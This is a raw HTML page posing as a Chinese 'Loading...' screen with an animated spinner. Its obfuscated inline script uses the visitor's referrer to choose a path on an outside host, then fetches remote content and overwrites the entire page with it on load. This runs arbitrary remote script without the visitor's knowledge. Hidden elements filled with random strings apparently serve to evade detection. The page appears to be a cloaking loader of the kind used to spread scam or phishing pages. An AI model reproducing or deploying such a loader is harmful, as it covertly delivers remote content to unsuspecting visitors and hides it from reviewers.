<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .J2xUJ6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .J2xUJ6 .nsWHmO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .J2xUJ6 .content {
            line-height: 50px;
            text-align: center
        }

        .J2xUJ6 .img {
            width: 100%
        }

        .J2xUJ6 .FCJdyFQ {
            text-align: center
        }

        .J2xUJ6 .FCJdyFQ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .J2xUJ6 .FCJdyFQ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .J2xUJ6 .FCJdyFQ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .J2xUJ6 .FCJdyFQ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .J2xUJ6 .FCJdyFQ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .J2xUJ6 .FCJdyFQ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .J2xUJ6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZVy0hE1K0xF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var z4wuwXw = ZVy0hE1K0xF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ z4wuwXw +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ z4wuwXw +".html?a=share";
		}
		
        k6RQu7j=url+"#"+new Date().getTime();
        k6RQu7j && function() {
            $.get(k6RQu7j, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >rKIKm60rPzB3aweSeMAsnHOPrmDUwye9YoXWsSmnaFQEqI3r9rF55tT8Y6Ccun</ul>
<ul style='display:none' >rKIKm60rPzB3aweSeMAsnHOPrmDUwye9YoXWsSmnaFQEqI3r9rF55tT8Y6Ccun</ul>
<span style='display:none'>qKhxBrGxFZkAojFvaHoiYwBjweYCInE2ViNqQ6</span><div class="J2xUJ6">
    <div class="nsWHmO">
        <div class="FCJdyFQ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >nq1rR5Wqu4cAemp5S8NgiTxtCNwozPfQpwG21t0YIXOQw6LispiIX1ewUqYqr6jRlQLtGJbEZEROEoR12BvUjmKE</h1>
<p  style='display:none'>rClKZPB7RgCYRSWgCvrLSuWQINpuyfIxh1H0UIj2v6kegFWr4B8mtJrMvVQy1o2oAN1ee0AQpfzhXMceOwxvKJMk1</p>
<h1 style='display:none' >nq1rR5Wqu4cAemp5S8NgiTxtCNwozPfQpwG21t0YIXOQw6LispiIX1ewUqYqr6jRlQLtGJbEZEROEoR12BvUjmKE</h1></body>
</html>